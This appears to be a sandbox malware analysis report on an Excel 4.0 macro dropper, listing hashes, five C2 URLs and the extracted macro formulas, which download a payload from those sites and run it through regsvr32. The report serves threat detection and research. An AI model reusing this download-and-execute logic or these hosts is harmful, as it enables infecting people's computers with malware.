General

  • Target: af3a4e74541baa2d8367812bc5070ddeaee770024b61a8180124aec05aeb07ef
  • Size: 91KB
  • Sample: 241120-yyplwasmf1
  • MD5: c6d061442f190c492b5a264592e23276
  • SHA1: 06b9815395a8818120bdce01858b0755f44b3c5c
  • SHA256: af3a4e74541baa2d8367812bc5070ddeaee770024b61a8180124aec05aeb07ef
  • SHA512: e29869d6e0f8352f3ce6903b2b7c9a8651d1b0725aee153f4624d27d4a0094c50cd6019a940dd1a2b9171815669ba93b6c9ab26c8e02e5be2fd857c0958df168
  • SSDEEP: 1536:NdNlX2L2nyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xX0bIS:Nd32KyVEoBo6hKb4llGsQjbxXS

Score
10/10

Malware Config

Extracted

Rule: Excel 4.0 XLM Macro
C2:
    https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/
    https://dev.subs2me.com/wp-includes/EMa/
    https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/
    https://yanapiri.com/upeatv/9IZP9RfbH338pFPI/
    https://gurmitjaswal.ca/frer-hate/LW37erwSAhgU/

Attributes
  • formulas (one macro formula per line, as extracted from the sample)

    =FORMULA()
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/","..\dw1.ocx",0,0)
    =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dev.subs2me.com/wp-includes/EMa/","..\dw1.ocx",0,0))
    =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/","..\dw1.ocx",0,0))
    =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://yanapiri.com/upeatv/9IZP9RfbH338pFPI/","..\dw1.ocx",0,0))
    =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://gurmitjaswal.ca/frer-hate/LW37erwSAhgU/","..\dw1.ocx",0,0))
    =IF('EFWFSFG'!D23<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dw1.ocx")
    =RETURN()

Extracted

    Language    Source           URLs
    xlm4.0      xlm40.dropper    https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/
    xlm4.0      xlm40.dropper    https://dev.subs2me.com/wp-includes/EMa/
    xlm4.0      xlm40.dropper    https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/

Targets

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
